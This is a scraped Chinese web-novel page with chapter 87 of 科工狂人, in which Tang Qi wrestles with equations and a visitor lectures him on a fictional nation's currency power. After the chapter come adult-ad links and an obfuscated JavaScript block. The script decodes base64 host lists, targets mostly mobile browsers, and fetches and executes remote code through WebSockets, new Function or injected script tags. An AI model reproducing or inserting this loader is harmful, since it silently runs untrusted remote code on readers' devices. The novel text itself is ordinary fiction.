笔趣阁

下载
字:
关灯 护眼
笔趣阁 > 科工狂人 > 第087章 你们疯了吗

第087章 你们疯了吗

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
从楼顶下来,唐起回到自己的房间,又开始研究“变色场”方程组。
  这次,他开始尝试代入一些常用到的解法,生硬地套解后半部分。
  ……太伤脑筋了,真恨不得把韦卡龙捉来,用皮鞭抽着他,逼他写出后半部分的解。
  唐起差点脑力竭瘁,有些苦恼地趴在台面上,无力地打起瞌睡来。
  嘀嗒嘀,嘀嗒嘀——
  突然,房门外,走道尽头挂着的那个壁钟,又响起了特殊的音乐,把唐起吵醒了过来。
  上午十点。
  ……来了,隔壁那个变态马上要发作了。
  唐起这心念刚想起,床头那面墙,还真的就传来一阵尖锐而沉闷的声音。
  ……我谢谢你,成功让我的身体里,多了一条神经条件反射弧!
  唐起推开椅子,站到那面墙前,抬起脚……
  ……真恨不得一脚踹过去,把那变态也一起踹倒!
  不过,唐起到底是一个理智且冷静的人,最终他还是克制住了。
  就在他重新坐回椅子,准备再次攻克“变色场”方程组时,房门被人笃笃笃地敲响了。
  ……应该又是井甜子小姐来敲门了,这也是一个有点小变态的女人。
  唐起心里发着牢骚,然后起身走向门口,去开门。
  门开处,一脸甜美笑容的井甜子,今天有点惊艳到了唐起。
  ……确定不是两个人?
  比起昨天的朴素,今天的井甜子格外换了一身柔和贴身的休闲服,又薄又轻柔的衣布,很巧妙地衬托出被昨天职业装掩盖掉的曼妙身姿,凹凸起伏,还波澜壮阔……
  唐起怪难堪地赶紧缩走眼光,并赶紧转移注意力,指指房间里面:
  “又……又响了……”
  井甜子点点头,脱下脚下一双高跟鞋,拿在手里晃了晃,一副替人伸张正义的态势,然后走进了唐起的房间。
  经过卫生间前面的小过道,带起了一阵茉莉花的香味,淡淡的……
  唐起吸了一口,脸上微微发烫。
  他把房门关了上去,然后跟着进到了里面。
  井甜子又像昨天那样,用尖尖的鞋跟,抵在床头那面墙壁上,横划一线,发出尖锐而低闷的声响。
  一横,两横,今天多加了一横,总共三横。
  三响过后,井甜子把一双高跟鞋丢在床边,她赤脚走在地面上,软绵绵的感觉,尽显柔美和恬静,散发出女性独特魅力。
  “这样报复,有……有意义吗?”
  唐起感觉心跳加快,有点语无伦次。
  “这是报复最有经济效益的方式,既避开了风险,又达到了警告的目的。”
  井甜子在床前的地板上,来回走动,最后竟然坐在了床上,还微仰着描了淡妆的脸,左右打量着这个房间:
  “我向你保证,今天过后,隔壁再也不会发出那样的声音,来打扰到我们了。”
  “你这还讲经济效益?”
  唐起见井甜子竟然坐在他的床上,没见她要走的意思,心里马上有些忐忑不安起来。
  ……天知道这个有点不可理喻的女士,接下来又会干些什么不可理喻的事情来啊?
  这时候,旅馆前面的海面上,一海里处的那个岛屿,突然传来一阵军舰的鸣笛声。
  声音响彻了整个海北道上空,更是穿透了旅馆,进入到唐起的房间,并回响在这局促的房间里,让人心神不安。
  “这些安保舰队,好像……好像并不受你们东林人的欢迎。”
  唐起努力找话题,转移让他尴尬的处境。
  “我们东林人又不傻,混合国的军队抵达的地方,混币必然畅通无阻。”
  坐在床上的井甜子,突然用力垫坐了两下,使得床垫发生了弹力,拱着她柔软的身子往上蹦了起来,一蹦一蹦的还上了节奏,跟玩蹦床似的:
  “以前不懂,还以为混合国打着世界警察的旗号,到处伸张正义,整个世界的安全,是靠混合国的维护才有的。后来读了经济学之后,我算是琢磨明白了,混合国到处安插他们的军队,其实是为他们的混币开路。”
  井甜子说到这里,停止了蹦床,坐在床边气喘吁吁的样子,接着道:
  “这不仅可以薅世界各国的羊毛,而且还树立起正义的形象,让世界各国都认为他是正义的代表,也间接让人产生对他的心理依赖,自然而然就会认为混合国,是世界上最安全的国家,于是纷纷把资产,转移到混合国,把资本投到混合国。这也是混合国的股市,一直牛上去的原因。”
  “你的分析,很有角度,不过……我好像累了……”
  唐起突然感觉身体乏力了起来,眼皮有点睁不开,坐在椅子上的他,竟然忍不住耷拉下了脑袋,一副困得不行的样子。
  ……糟糕,难道是我的心脏,开始负荷不起这个越来越大只的身体了吗?
  “唐先生,你怎么了?快……快,我扶你上床去睡会吧。”
  见到唐起坐在那里,上身越来越倾斜下来,井甜子吃了一惊,赶紧手慌脚乱地上前来,一把搀扶住了唐起,然后把他扶到了床上……
免费看片APP    美女直播间
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x6a\x58\x73\x4d\x4b\x72\x4d\x57\x79']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vc2tkamZrZGwza2wuc2hwcm91ZC5jbb20=','d3NzOOi8vd3MuZ2VuZ2Z1cXVhbi5jb206OOTE5MSx3c3M6Ly93cy5xb3Jvc21hbGwuY29tOOjkxOOTEsd3NzOOi8vd3Mud2VpeGlzaXdhbmcuY29tOOjkxOOTE=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《科工狂人》
打开
浏览器
继续